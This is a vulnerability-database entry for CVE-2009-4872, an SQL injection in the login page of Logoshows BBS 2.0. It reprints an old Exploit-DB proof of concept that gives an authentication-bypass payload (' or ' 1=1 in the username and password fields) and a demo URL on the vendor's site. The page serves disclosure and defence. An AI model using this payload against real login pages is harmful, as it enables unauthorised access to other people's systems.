CVE-2009-4872
Description
Multiple SQL injection vulnerabilities in globepersonnel_login.asp in Logoshows BBS 2.0 allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password fields.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Logoshows BBS 2.0 - Authentication Bypass
#############################################################################
# #
# Logoshows BBS 2.0 (Auth Bypass) SQL Injection Vulnerability #
# #
#############################################################################
#############################################################################
[~] -=[Dns-Team Marocain Hackers]=-
[~] Author: Dns-Team
[~] Contact: Q2[at]HoTmail[dot]Fr
[~] Site: www.Scam4u.com + www.Dns-Team.com
[~] Greetz: Sa4d + HSMX + Stack + PR0H4CK3RZ + N@bilX + Ga3 Réjà là Xd :)
[~] Download : http://www.logoshows.com/download/bbs88.rar
#[---------------------------------I'm Kh0K0m MÃ N!x--------------------------------------]
[»] Demo :
#
# http://www.logoshows.com/bbs/globepersonnel_login.asp
#
[»] Exploit :
#
# username : ' or ' 1=1
# password : ' or ' 1=1
#
#[------------------------------------------------------------------------------------]
# - - +- Tnx Str0ke For UR Support -+ - -
#########################################################################################################
# milw0rm.com [2009-08-07]
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| logoshows | logoshows_bbs | 2.0 | |
References
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.